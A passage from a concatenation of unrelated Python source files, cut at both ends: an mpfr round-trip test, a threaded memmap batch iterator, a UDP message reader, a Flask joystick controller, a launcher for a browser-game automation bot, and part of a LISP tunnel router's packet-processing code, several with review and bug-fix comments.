    mantissas assembled from random high bits, an optional zero gap, and
    random low bits, over a wide exponent range."""
    import random
    print('Watch for output ...')
    tests = 1 << 20
    print('-- testing {} big mpfrs --'.format(tests))
    for _ in range(tests):
        # High part: either a random run of up to 1024 bits, or a single 1.
        l = random.randint(0, 1)
        if l == 0:
            llen = random.randint(1, 1024)
            lbits = random.randint(0, bitmask(llen))
        else:
            lbits = 1
        # Middle: optionally a gap of up to 2048 zero bits. (This `m` is a
        # temporary coin flip; it is overwritten below with the mantissa.)
        m = random.randint(0, 1)
        if m == 0:
            offset = random.randint(1, 2048)
        else:
            offset = 0
        # Low part: random bits, a single 1, or nothing.
        r = random.randint(0, 2)
        if r == 0:
            rlen = random.randint(1, 1024)
            rbits = random.randint(0, bitmask(rlen))
        elif r == 1:
            rbits = 1
        else:
            rbits = 0
        m = (lbits << (offset + rbits.bit_length())) | rbits
        exp = random.randint(-65535, 65535)
        f = mpfr_from_mantissa_exp(m, exp)
        m1, exp1 = mpfr_to_mantissa_exp(f)
        if not (m == m1 and exp == exp1):
            if m == 0:
                pass # IEEE 754 floats report small exponents for 0 (smaller than smallest denorm...), while mpfr reports 1
            elif abs(m) == 1 and abs(m1) == 2 and exp1 == exp - 1:
                pass # The smallest denorm has less than 2 precision, which mpfr can't represent
            else:
                print('disagreement on {} << {} . {}'.format(lbits, offset, rbits))
                print(' m, exp failed to round trip through mpfr: {} = {}, {} = {}\n'.format(m, m1, exp, exp1))
    print('... Done.')
|
memmap_iterator.py | import numpy as np
from keras.preprocessing.image import Iterator
from queue import Queue
from threading import Thread
import time
class MemmapIterator():
    """Threaded batch iterator over a float32 numpy memmap of image features.

    Worker threads pull shuffled index batches from a shared keras Iterator
    and push ready (inputs[, labels]) batches onto a bounded queue; next()
    simply pops from that queue.
    """
    def __init__(self, memmap_path, memmap_shape, images_df, num_classes=None, batch_size=32, shuffle=True, seed=None,
                 pool_wrokers=4, use_side_input=False):
        # NOTE(review): 'pool_wrokers' is a typo for 'pool_workers', but it is
        # a keyword parameter visible to callers, so renaming would break them.
        if seed:
            np.random.seed(seed)
        # Read-only view of the pre-extracted feature tensor on disk.
        self.x = np.memmap(memmap_path, dtype=np.float32, mode='r', shape=memmap_shape)
        self.images_df = images_df
        # Copy the per-sample columns into plain arrays, then drop the
        # DataFrame so worker threads never touch pandas objects.
        # NOTE(review): .as_matrix() was removed in pandas 1.0 -- switch to
        # .to_numpy() when upgrading pandas.
        self.images_df_index = np.copy(self.images_df.index.values)
        self.images_df_num_imgs = np.copy(self.images_df.num_imgs.as_matrix())
        self.images_df_img_idx = np.copy(self.images_df.img_idx.as_matrix())
        self.has_y = 'category_idx' in images_df.columns
        if self.has_y:
            self.images_df_category_idx = np.copy(self.images_df.category_idx.as_matrix())
        del self.images_df
        self.num_classes = num_classes
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.use_side_input = use_side_input
        self.samples = len(self.images_df_index)
        # keras Iterator supplies the locked, optionally shuffled index stream.
        self.it = Iterator(self.samples, self.batch_size, self.shuffle, seed)
        self.queue = Queue(maxsize=40)  # bounds read-ahead memory
        self.stop_flag = False
        self.threads = []
        for i in range(pool_wrokers):
            thread = Thread(target=self.read_batches)
            thread.start()
            self.threads.append(thread)

    def read_batches(self):
        # Worker loop: build one batch per iteration and enqueue it.
        while True:
            if self.stop_flag == True:
                return
            # The index generator is shared by all workers; serialize access.
            with self.it.lock:
                index_array = next(self.it.index_generator)[0]
            m1 = np.zeros((len(index_array), *self.x.shape[1:]), dtype=np.float32)
            if self.use_side_input:
                # 8 one-hot slots: num_imgs (1-based) in [0:4], img_idx in
                # [4:8] -- presumably; TODO confirm against images_df producer.
                m2 = np.zeros((len(index_array), 8), dtype=np.float32)
            if self.has_y:
                p = np.zeros(len(index_array), dtype=np.float32)
            for bi, i in enumerate(index_array):
                m1[bi] = self.x[self.images_df_index[i]]
                if self.use_side_input:
                    m2[bi, self.images_df_num_imgs[i] - 1] = 1
                    m2[bi, 4 + self.images_df_img_idx[i]] = 1
                if self.has_y:
                    # noinspection PyUnboundLocalVariable
                    p[bi] = self.images_df_category_idx[i]
            if self.use_side_input:
                inputs = [m1, m2]
            else:
                inputs = m1
            # put() blocks when the queue is full, throttling the workers.
            if self.has_y:
                self.queue.put((inputs, p))
            else:
                self.queue.put(inputs)

    def next(self):
        # Hand out the next ready batch (blocks until one is available).
        return self.queue.get()

    def terminate(self):
        # Ask workers to stop, then repeatedly drain the queue so any worker
        # blocked on a full queue can wake up, see stop_flag, and exit.
        self.stop_flag = True
        while True:
            try:
                while True:
                    self.queue.get(block=False)
            except:
                # queue.Empty -- nothing left to drain right now
                pass
            live_threads = 0
            for thread in self.threads:
                live_threads += 1 if thread.is_alive() else 0
            if live_threads == 0:
                return
            print('Threads running ', live_threads)
            for thread in self.threads:
                thread.join(timeout=5)

    def __iter__(self):
        return self

    def __next__(self, *args, **kwargs):
        return self.next(*args, **kwargs)
|
UDPReader.py | import struct
import socket
import abc
import threading
import traceback
import time
class UDPReader:
    """Reassemble chunked UDP datagrams and hand each complete UTF-8 message
    to the abstract Process() hook.

    Each datagram starts with a one-byte sequence marker; a value of 1 (or 0)
    marks the final chunk of a message, values > 1 are continuation chunks.
    """

    def __init__(self, port):
        self.MAX_DGRAM = 2 ** 16  # largest possible UDP datagram
        self.port = port
        self.loop = 1     # set to 0 by stop() to end the receive loop
        self.running = 0  # 1 while the receive loop is active

    def dump_buffer(self, s):
        # Discard stale segments until a final-chunk marker, so the loop
        # starts aligned on a message boundary.
        while True:
            seg, addr = s.recvfrom(self.MAX_DGRAM)
            if struct.unpack("B", seg[0:1])[0] == 1:
                break

    def start(self):
        """Run the receive loop on a daemon thread."""
        self.loop = 1
        thread = threading.Thread(target=self.Loop)
        thread.daemon = True
        thread.start()

    def Loop(self):
        """Receive loop: accumulate chunks and dispatch complete messages."""
        self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.s.bind(('', self.port))
        dat = b''
        self.dump_buffer(self.s)
        while self.loop == 1:
            self.running = 1
            try:
                seg, addr = self.s.recvfrom(self.MAX_DGRAM)
                # Both branches of the original appended seg[1:]; only the
                # final chunk (marker <= 1) additionally flushes the message.
                dat += seg[1:]
                if struct.unpack("B", seg[0:1])[0] <= 1:
                    self.Process(str(dat, 'utf-8'))
                    dat = b''
            except OSError as e:
                # BUG FIX: was `except OSError:` followed by print(e), which
                # raised NameError because `e` was never bound.
                # OSError: [WinError 10038] An operation was attempted on something that is not a socket
                traceback.print_exc()
                print(e)
            except Exception as e:
                traceback.print_exc()
                print(e)
        self.running = 0

    def stop(self):
        """Stop the loop and force any blocking recvfrom to return."""
        self.loop = 0
        try:
            if hasattr(self, "s") and self.s is not None:
                self.s.shutdown(socket.SHUT_RDWR)
        except (socket.error, OSError, ValueError):
            pass

    @abc.abstractmethod
    def Process(self, value):
        # Subclasses receive each complete decoded message here.
        pass
web.py | #!/usr/bin/env python3
from flask import Flask
import time
import threading
import cereal.messaging as messaging
app = Flask(__name__)
pm = messaging.PubMaster(['testJoystick'])

# Static joystick page: polls the on-screen joystick every 50 ms and reports
# the (negated-x, y) position to /control/<x>/<y>.
# BUG FIX: the original HTML never closed <body> and <html>.
index = """
<html>
<head>
<script src="https://github.com/bobboteck/JoyStick/releases/download/v1.1.6/joy.min.js"></script>
</head>
<body>
<div id="joyDiv" style="width:100%;height:100%"></div>
<script type="text/javascript">
// Create JoyStick object into the DIV 'joyDiv'
var joy = new JoyStick('joyDiv');
setInterval(function(){
var x = -joy.GetX()/100;
var y = joy.GetY()/100;
let xhr = new XMLHttpRequest();
xhr.open("GET", "/control/"+x+"/"+y);
xhr.send();
}, 50);
</script>
</body>
</html>
"""
@app.route("/")
def hello_world():
    # Serve the embedded joystick page.
    return index
# Timestamp of the last message published from the browser; the watchdog
# thread uses it to detect a stalled page.
last_send_time = time.time()


@app.route("/control/<x>/<y>")
def control(x, y):
    """Clamp the reported joystick axes into [-1, 1] and publish them."""
    global last_send_time
    x = max(-1, min(1, float(x)))
    y = max(-1, min(1, float(y)))
    msg = messaging.new_message('testJoystick')
    msg.testJoystick.axes = [y, x]
    msg.testJoystick.buttons = [False]
    pm.send('testJoystick', msg)
    last_send_time = time.time()
    return ""
def handle_timeout():
    """Watchdog loop: publish a neutral joystick message whenever the web
    page has not reported for more than half a second."""
    while True:
        now = time.time()
        if now > last_send_time + 0.5:
            print("timeout, no web in %.2f s" % (now - last_send_time))
            msg = messaging.new_message('testJoystick')
            msg.testJoystick.axes = [0, 0]
            msg.testJoystick.buttons = [False]
            pm.send('testJoystick', msg)
        time.sleep(0.1)
if __name__ == '__main__':
    # Run the watchdog as a daemon so Ctrl-C on flask also ends it.
    threading.Thread(target=handle_timeout, daemon=True).start()
    # Listen on all interfaces so a device on the LAN can drive.
    app.run(host="0.0.0.0")
|
__init__.py | #!/usr/bin/python
import configparser
import os
import threading
import logging
from debrisField import DebrisField
from saving import Saving
from expedition import Expedition
from utils import Utils
from properties import Properties
from probe import Probe
from loguru import logger
########################
# run prob bot #
########################
def run_prob_bot(test_):
    """Thread entry point for the espionage-probe bot.

    Depending on the PROBES_* properties this either re-uses existing spy
    reports or collects target planets, probes them, and feeds the resulting
    reports to the auto-probe loop. Reads the module-level globals
    (properties, empire, telegram, utils); `test_` is unused, matching the
    other bot entry points.
    """
    logging.info("Thread %s: starting", 'run_prob_bot')
    probe = Probe(properties, empire, telegram, utils)
    all_inactive_planets = []
    if properties.PROBES_TAKE_BEST_PLANETS and properties.PROBES_DELETE_OLD_SPY_REPORTS is True:
        all_inactive_planets = probe.get_best_planets()
    elif properties.PROBES_TAKE_BEST_PLANETS is False and properties.PROBES_DELETE_OLD_SPY_REPORTS is True:
        # BUG FIX: was probe.get_inactive_planetsself(), an AttributeError
        # at runtime ("self" accidentally pasted into the method name).
        all_inactive_planets = probe.get_inactive_planets()  # get inactive planets
    # send probes
    spy_reports = None
    if properties.PROBES_DELETE_OLD_SPY_REPORTS is False:
        spy_reports = probe.print_report(properties.PROBES_LENGTH_OLD_SPY_REPORTS)
    else:
        probe.send_probes(all_inactive_planets)
        # ceil(len/10): spy reports are paginated ten per page
        spy_reports = probe.print_report(
            int(len(all_inactive_planets) / 10) + (len(all_inactive_planets) % 10 > 0))  # print spy reports
    probe.run_auto_probe(spy_reports)
    logging.info("Thread %s: finishing", 'run_prob_bot')
########################
# run debris bot #
########################
def run_debris_bot(test_):
    """Thread entry point: collect debris fields until the bot finishes."""
    logging.info("Thread %s: starting", 'run_debris_bot')
    bot = DebrisField(properties, empire, telegram, utils)
    bot.auto_collect_debris_fields()
    logging.info("Thread %s: finishing", 'run_debris_bot')
########################
# run save bot #
########################
def run_save_bot(test_):
    """Thread entry point: run the fleet-saving loop until it finishes."""
    logging.info("Thread %s: starting", 'run_save_bot')
    bot = Saving(properties, empire, telegram, utils)
    bot.auto_run_saving()
    logging.info("Thread %s: finishing", 'run_save_bot')
########################
# run expedition bot #
########################
def run_expedition_bot(test_):
    """Thread entry point: run the expedition loop until it finishes."""
    logging.info("Thread %s: starting", 'run_expedition_bot')
    bot = Expedition(properties, empire, telegram, utils)
    bot.auto_run_expedition()
    logging.info("Thread %s: finishing", 'run_expedition_bot')
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
    # init log
    logger.add("log/file_{time}.log")

    # Locate config.cfg one directory above this file, path-separator safe.
    config = configparser.ConfigParser()
    path = '/'.join((os.path.abspath(__file__).replace('\\', '/')).split('/')[:-1])
    config.read(os.path.join(path, '../config.cfg'))

    # init objects -- module-level on purpose: the bot entry points above
    # read these globals.
    utils = Utils(config['Login'], config['Telegram'])
    empire = utils.empire
    telegram = utils.telegram
    properties = Properties(empire)

    try:
        log_format = "%(asctime)s: %(message)s"
        logging.basicConfig(format=log_format, level=logging.INFO, datefmt="%H:%M:%S")
        threads = list()

        # (enabled flag, log name, entry point), started in the same order
        # as before: probes, expeditions, saving, debris.
        bots = [
            (properties.BOT_PROBE, 'probs', run_prob_bot),
            (properties.BOT_EXPEDITIONS, 'expeditions', run_expedition_bot),
            (properties.BOT_SAVE, 'saving', run_save_bot),
            (properties.BOT_DEBRIS, 'debris', run_debris_bot),
        ]
        for enabled, name, target in bots:
            if not enabled:
                continue
            logging.info("Main : create and start thread %s.", name)
            bot_thread = threading.Thread(target=target, args=(properties,))
            threads.append(bot_thread)
            bot_thread.start()

        for index, thread in enumerate(threads):
            logging.info("Main : before joining thread %d.", index)
            thread.join()
            logging.info("Main : thread %d done", index)
    except Exception:
        # BUG FIX: was a bare `except` followed by `while 1: pass`, which
        # swallowed the traceback and busy-spun a CPU core forever.
        print("Error: unable to start thread")
        logging.exception("Main : startup failed")
        threading.Event().wait()  # stay alive (as before) without spinning
|
lisp-rtr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-itr process.
#
lisp_send_sockets = [None, None, None]  # send sockets passed to lisp.* -- 3 slots; exact roles defined in lisp.py
lisp_ipc_listen_socket = None           # IPC socket, set up elsewhere in this process
lisp_ipc_punt_socket = None             # IPC punt socket
lisp_ephem_listen_socket = None         # ephemeral-port UDP listen socket
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None                  # raw IPv4 socket for re-encapsulation
lisp_raw_v6_socket = None               # raw IPv6 socket
lisp_periodic_timer = None              # periodic maintenance timer handle
lisp_threads = []                       # worker/pcap threads reported by the show commands
#------------------------------------------------------------------------------
#
# lisp_rtr_show_command
#
# Display state in an RTR.
#
def lisp_rtr_show_command(parameter):
    """Display state in an RTR (delegates to lispconfig)."""
    global lisp_threads
    return lispconfig.lisp_itr_rtr_show_command(parameter, "RTR", lisp_threads)
#enddef
#
# lisp_rtr_show_command_dns
#
# Display state in an RTR but pass in boolean to not do a DNS lookup.
#
def lisp_rtr_show_command_dns(parameter):
    """Display state in an RTR, suppressing DNS lookups."""
    global lisp_threads
    return lispconfig.lisp_itr_rtr_show_command(parameter, "RTR",
                                                lisp_threads, True)
#enddef
#
# lisp_rtr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_rtr_show_keys_command(parameter):
    """Show the crypto key list known to this RTR."""
    return lispconfig.lisp_show_crypto_list("RTR")
#enddef
#
# lisp_rtr_database_mapping_command
#
# Add database-mapping entry so RTR can sign Map-Requests.
#
def lisp_rtr_database_mapping_command(kv_pair):
    """Add a database-mapping entry so the RTR can sign Map-Requests."""
    lispconfig.lisp_database_mapping_command(kv_pair)
#enddef
#
# lisp_rtr_show_rloc_probe_command
#
# Display RLOC-probe list state in an RTR.
#
def lisp_rtr_show_rloc_probe_command(parameter):
    """Display the RLOC-probe list state in an RTR."""
    return lispconfig.lisp_itr_rtr_show_rloc_probe_command("RTR")
#enddef
#
# lisp_fix_rloc_encap_state_entry
#
# Examine one map-cache entry.
#
def lisp_fix_rloc_encap_state_entry(mc, parms):
    """Update one map-cache entry after a NAT address/port change.

    parms is [lisp_sockets, rloc, port, hostname]; any RLOC or RLE node in
    *mc* whose rloc_name matches hostname gets the new translated rloc:port.
    Returns (True, parms) so this can be used as a walk_cache callback.
    """
    lisp_sockets, rloc, port, hostname = parms
    addr = "{}:{}".format(rloc.print_address_no_iid(), port)
    eid = lisp.green(mc.print_eid_tuple(), False)
    msg = "Changed '{}' translated address:port to {} for EID {}, {} {}". \
        format(hostname, lisp.red(addr, False), eid, "{}", "{}")

    for rloc_entry in mc.rloc_set:
        if (rloc_entry.rle):
            # Fix up replication-list nodes that carry this hostname.
            for rle_node in rloc_entry.rle.rle_nodes:
                if (rle_node.rloc_name != hostname): continue
                rle_node.store_translated_rloc(rloc, port)
                old_addr = rle_node.address.print_address_no_iid() + ":" + \
                    str(rle_node.translated_port)
                lisp.lprint(msg.format("RLE", old_addr))
            #endfor
        #endif
        if (rloc_entry.rloc_name != hostname): continue

        #
        # Update lisp-crypto encap array. Put keys in new dictionary array
        # location since translated address and port changed. We don't want
        # to rekey because of a NAT change.
        #
        # NOTE(review): dict.has_key() is Python 2 only; use "in" if porting.
        old_addr = rloc_entry.rloc.print_address_no_iid() + ":" + \
            str(rloc_entry.translated_port)
        if (lisp.lisp_crypto_keys_by_rloc_encap.has_key(old_addr)):
            keys = lisp.lisp_crypto_keys_by_rloc_encap[old_addr]
            lisp.lisp_crypto_keys_by_rloc_encap[addr] = keys
        #endif

        #
        # Update translated information with new information.
        #
        rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
        rloc_entry.store_translated_rloc(rloc, port)
        rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
        lisp.lprint(msg.format("RLOC", old_addr))

        #
        # Trigger RLOC-probe if enabled.
        #
        if (lisp.lisp_rloc_probing):
            seid = None if (mc.group.is_null()) else mc.eid
            deid = mc.eid if (mc.group.is_null()) else mc.group
            lisp.lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc_entry)
        #endif
    #endfor

    #
    # Write change to external data-plane.
    #
    lisp.lisp_write_ipc_map_cache(True, mc)
    return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state_walk
#
# Walk main cache and source-cache for each entry to handle multicast entries.
#
def lisp_fix_rloc_encap_state_walk(mc, parms):
    #
    # Walk main cache and source-cache for each entry to handle multicast
    # entries. Returns (True, parms) so the enclosing walk continues.
    #

    #
    # There is only destination state in this map-cache entry.
    #
    if (mc.group.is_null()): return(lisp_fix_rloc_encap_state_entry(mc, parms))

    # PEP 8: identity comparison with None.
    if (mc.source_cache is None): return(True, parms)

    #
    # There is (source, group) state so walk all sources for this group
    # entry.
    #
    mc.source_cache.walk_cache(lisp_fix_rloc_encap_state_entry, parms)
    return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state
#
# Walk map-cache looking for supplied RLOC and change its encap-port to
# the supplied port passed to this function.
#
def lisp_fix_rloc_encap_state(sockets, hostname, rloc, port):
    #
    # Walk the entire map-cache; the walker fixes every entry that carries
    # the RLOC named 'hostname' so its encap address:port reflects the new
    # NAT translation ('rloc':'port').
    #
    walk_parms = [sockets, rloc, port, hostname]
    lisp.lisp_map_cache.walk_cache(lisp_fix_rloc_encap_state_walk, walk_parms)
    return
#enddef
#
# lisp_rtr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulated it.
#
def lisp_rtr_data_plane(lisp_packet, thread_name):
    #
    # Main RTR forwarding path: take a LISP encapsulated packet captured by
    # pcap, decap it, process the inner header, and re-encapsulate (or
    # natively forward / replicate) it. 'lisp_packet' is a lisp.lisp_packet
    # instance; 'thread_name' is used only for log labelling.
    #
    global lisp_send_sockets, lisp_ephem_prot, lisp_data_packet
    global lisp_raw_socket, lisp_raw_v6_socket

    packet = lisp_packet

    #
    # Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
    # lisp_is_rloc_probe() returns a modified buffer when it was a probe.
    #
    orig_pkt = packet.packet
    pkt = orig_pkt
    pkt, source, port, ttl = lisp.lisp_is_rloc_probe(pkt, -1)
    if (orig_pkt != pkt):
        if (source == None): return
        lisp.lisp_parse_packet(lisp_send_sockets, pkt, source, port, ttl)
        return
    #endif

    #
    # First check if we are assembling IPv4 fragments.
    #
    packet.packet = lisp.lisp_reassemble(packet.packet)
    if (packet.packet == None): return

    #
    # We need to cache the input encapsualted packet as well as the output
    # encapsulated packet, so deep-copy when flow logging is on.
    #
    if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
    if (packet.decode(True, None, lisp.lisp_decap_stats) == None): return

    #
    # Print some useful header fields and strip outer headers..
    #
    packet.print_packet("Receive-({})".format(thread_name), True)

    #
    # Strip outer headers and start inner header forwarding logic.
    #
    packet.strip_outer_headers()

    #
    # If instance-id is 0xffffff, this is a Info-Request packet encapsulated
    # to port 4341. We need to store the source port and source RLOC for
    # NAT-traversal reasons.
    #
    # We don't need to send an Info-Reply from the 4341 data port. There is no
    # information the xTR needs. It has the translated address from the
    # map-server, and the NAT is ready for packets from port 4341 since we
    # received this Info-Request.
    #
    if (packet.lisp_header.get_instance_id() == 0xffffff):
        header = lisp.lisp_control_header()
        header.decode(packet.packet)
        if (header.is_info_request()):
            info = lisp.lisp_info()
            info.decode(packet.packet)
            info.print_info()

            #
            # Store/refresh NAT state and Fix map-cache entries if there was
            # a change.
            #
            h = info.hostname if (info.hostname != None) else ""
            s = packet.outer_source
            p = packet.udp_sport
            if (lisp.lisp_store_nat_info(h, s, p)):
                lisp_fix_rloc_encap_state(lisp_send_sockets, h, s, p)
            #endif
        else:
            # Other control message arrived data-encapsulated; skip the
            # 28-byte IP/UDP header and hand it to the control-plane. TTL
            # only matters for RLOC-probe requests/replies.
            source = packet.outer_source.print_address_no_iid()
            ttl = packet.outer_ttl
            packet = packet.packet
            if (lisp.lisp_is_rloc_probe_request(packet[28]) == False and
                lisp.lisp_is_rloc_probe_reply(packet[28]) == False): ttl = -1
            packet = packet[28::]
            lisp.lisp_parse_packet(lisp_send_sockets, packet, source, 0, ttl)
        #endif
        return
    #endif

    #
    # Packets are arriving on pcap interface. Need to check if another data-
    # plane is running. If so, don't deliver duplicates.
    #
    if (lisp.lisp_ipc_data_plane):
        lisp.dprint("Drop packet, external data-plane active")
        return
    #endif

    #
    # Increment global stats.
    #
    lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))

    #
    # Process inner header (checksum and decrement ttl).
    #
    if (packet.inner_dest.is_mac()):
        packet.packet = lisp.lisp_mac_input(packet.packet)
        if (packet.packet == None): return
        packet.encap_port = lisp.LISP_VXLAN_DATA_PORT
    elif (packet.inner_version == 4):
        packet.packet = lisp.lisp_ipv4_input(packet.packet)
        if (packet.packet == None): return
        packet.inner_ttl = packet.outer_ttl
    elif (packet.inner_version == 6):
        # NOTE(review): the v6 input function takes the whole packet object,
        # unlike the v4/MAC paths which take the buffer -- confirm intended.
        packet.packet = lisp.lisp_ipv6_input(packet)
        if (packet.packet == None): return
        packet.inner_ttl = packet.outer_ttl
    else:
        lisp.dprint("Cannot parse inner packet header")
        return
    #endif

    #
    # Process decap node trace function.
    #
    if (packet.is_trace()):
        if (lisp.lisp_trace_append(packet, "decap") == False): return
        packet.outer_source.afi = lisp.LISP_AFI_NONE
        packet.outer_dest.afi = lisp.LISP_AFI_NONE
    #endif

    #
    # Do map-cache lookup. If no entry found, send Map-Request.
    #
    mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)

    #
    # Check if we are doing secondary-instance-ids only when we have a
    # map-cache entry in the IID that is possibly a non-LISP site.
    #
    if (mc and (mc.action == lisp.LISP_NATIVE_FORWARD_ACTION or
        mc.eid.address == 0)):
        db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
        if (db and db.secondary_iid):
            dest_eid = packet.inner_dest
            dest_eid.instance_id = db.secondary_iid
            mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
        #endif
    #endif

    #
    # Map-cache lookup miss: rate-limited Map-Request, then drop.
    #
    if (mc == None or mc.action == lisp.LISP_SEND_MAP_REQUEST_ACTION):
        if (lisp.lisp_rate_limit_map_request(packet.inner_source,
            packet.inner_dest)): return
        lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
            packet.inner_source, packet.inner_dest, None)
        if (packet.is_trace()): lisp.lisp_trace_append(packet)
        return
    #endif

    #
    # Send Map-Request to see if there is a RLOC change or to refresh an
    # entry that is about to time out. The entry is still used below.
    #
    if (mc and mc.is_active() and mc.has_ttl_elapsed()):
        lisp.lprint("Refresh map-cache entry {}".format( \
            lisp.green(mc.print_eid_tuple(), False)))
        lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
            packet.inner_source, packet.inner_dest, None)
    #endif

    #
    # Update stats for entry. Stats per RLOC is done in lisp_mapping.select_
    # rloc().
    #
    mc.stats.increment(len(packet.packet))

    #
    # Encapsulate or native forward packet.
    #
    dest_rloc, dest_port, nonce, action, rle = mc.select_rloc(packet, None)
    if (dest_rloc == None and rle == None):
        if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
            lisp.dprint("Natively forwarding")
            packet.send_packet(lisp_raw_socket, packet.inner_dest)
            if (packet.is_trace()): lisp.lisp_trace_append(packet)
            return
        #endif
        lisp.dprint("No reachable RLOCs found")
        if (packet.is_trace()): lisp.lisp_trace_append(packet)
        return
    #endif
    if (dest_rloc and dest_rloc.is_null()):
        lisp.dprint("Drop action RLOC found")
        if (packet.is_trace()): lisp.lisp_trace_append(packet)
        return
    #endif

    #
    # Setup outer header for either unicast or multicast transmission..
    #
    packet.outer_tos = packet.inner_tos
    packet.outer_ttl = packet.inner_ttl

    #
    # Do unicast encapsulation.
    #
    if (dest_rloc):
        packet.encap_port = dest_port
        if (dest_port == 0): packet.encap_port = lisp.LISP_DATA_PORT
        packet.outer_dest.copy_address(dest_rloc)
        version = packet.outer_dest.afi_to_version()
        packet.outer_version = version
        source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
            lisp.lisp_myrlocs[1]
        packet.outer_source.copy_address(source_rloc)

        if (packet.is_trace()):
            if (lisp.lisp_trace_append(packet) == False): return
        #endif

        #
        # Encode new LISP, UDP, and outer header.
        #
        if (packet.encode(nonce) == None): return
        if (len(packet.packet) <= 1500): packet.print_packet("Send", True)

        #
        # Send out on raw socket.
        #
        raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
        packet.send_packet(raw_socket, packet.outer_dest)
    elif (rle):
        #
        # Do replication of RLE is returned: one encap per RLE node.
        #
        orig_len = len(packet.packet)
        for node in rle.rle_forwarding_list:
            packet.outer_dest.copy_address(node.address)
            packet.encap_port = lisp.LISP_DATA_PORT if \
                node.translated_port == 0 else node.translated_port
            version = packet.outer_dest.afi_to_version()
            packet.outer_version = version
            source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
                lisp.lisp_myrlocs[1]
            packet.outer_source.copy_address(source_rloc)

            if (packet.is_trace()):
                if (lisp.lisp_trace_append(packet) == False): return
            #endif

            if (packet.encode(None) == None): return
            packet.print_packet("Replicate-to-L{}".format(node.level), True)
            packet.send_packet(lisp_raw_socket, packet.outer_dest)

            #
            # We need to strip the encapsulation header so we can add a new
            # one for the next replication.
            #
            strip_len = len(packet.packet) - orig_len
            packet.packet = packet.packet[strip_len::]
            if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
        #endfor
    #endif

    #
    # Don't need packet structure anymore.
    #
    del(packet)
    return
#enddef
#
# lisp_rtr_worker_thread
#
# This function runs for each thread started.
#
def lisp_rtr_worker_thread(lisp_thread):
    #
    # Body of each worker thread: block on this thread's input queue for
    # packet buffers handed over by the pcap threads, account for them,
    # then run the decap/encap data-plane.
    #
    lisp.lisp_set_exception()
    while (True):
        buf = lisp_thread.input_queue.get()

        # Count input packets and bytes.
        lisp_thread.input_stats.increment(len(buf))

        # Store the buffer in this thread's pre-allocated packet structure
        # and process it.
        lisp_thread.lisp_packet.packet = buf
        lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
    #endwhile
    return
#enddef
#
# lisp_triage
#
# Decide which RTR thread should process packet. Do a modulus on the timestamp
# to randomly have a single thread process a received packet.
#
def lisp_triage(thread):
    #
    # Decide which RTR pcap thread should process a packet: fold the
    # current timestamp modulo the pcap-thread count into an index and
    # claim the packet only when it matches this thread's number.
    #
    chosen = int(time.time() % thread.number_of_pcap_threads)
    return(chosen == thread.thread_number)
#enddef
#
# lisp_rtr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop(). IPC it to ourselves so
# main thread can get access to lisp.lisp_map_cache.
#
def lisp_rtr_pcap_process_packet(parms, not_used, packet):
    #
    # pcap.loop() callback: 'parms' is [device, lisp_thread]. Triage first
    # so exactly one pcap thread handles each captured packet.
    #
    if (lisp_triage(parms[1]) == False): return

    device, lisp_thread = parms[0], parms[1]
    use_workers = lisp_thread.number_of_worker_threads
    lisp_thread.input_stats.increment(len(packet))

    #
    # Jump over MAC header if packet received on interface. There is a 4-byte
    # internal header in any case (loopback interfaces will have a 4 byte
    # header)..
    #
    offset = 4 if device == "lo0" else (14 if lisp.lisp_is_macos() else 16)
    packet = packet[offset::]

    #
    # With worker threads configured, round-robin the packet onto a worker
    # queue; otherwise process it inline on this pcap thread.
    #
    if (use_workers):
        index = lisp_thread.input_stats.packet_count % use_workers
        index = index + (len(lisp_threads) - use_workers)
        lisp_threads[index].input_queue.put(packet)
    else:
        lisp_thread.lisp_packet.packet = packet
        lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
    #endif
    return
#enddef
#
# lisp_rtr_pcap_thread
#
# Receive LISP encapsulated packet from pcap.
#
def lisp_rtr_pcap_thread(lisp_thread):
    #
    # Per-thread pcap capture loop: build a BPF filter matching LISP data
    # (4341/8472/4789) and RLOC-probe control traffic addressed to any of
    # our local addresses, then hand every captured frame to
    # lisp_rtr_pcap_process_packet().
    #
    lisp.lisp_set_exception()
    if (lisp.lisp_myrlocs[0] == None): return

    device = "lo0" if lisp.lisp_is_macos() else "any"
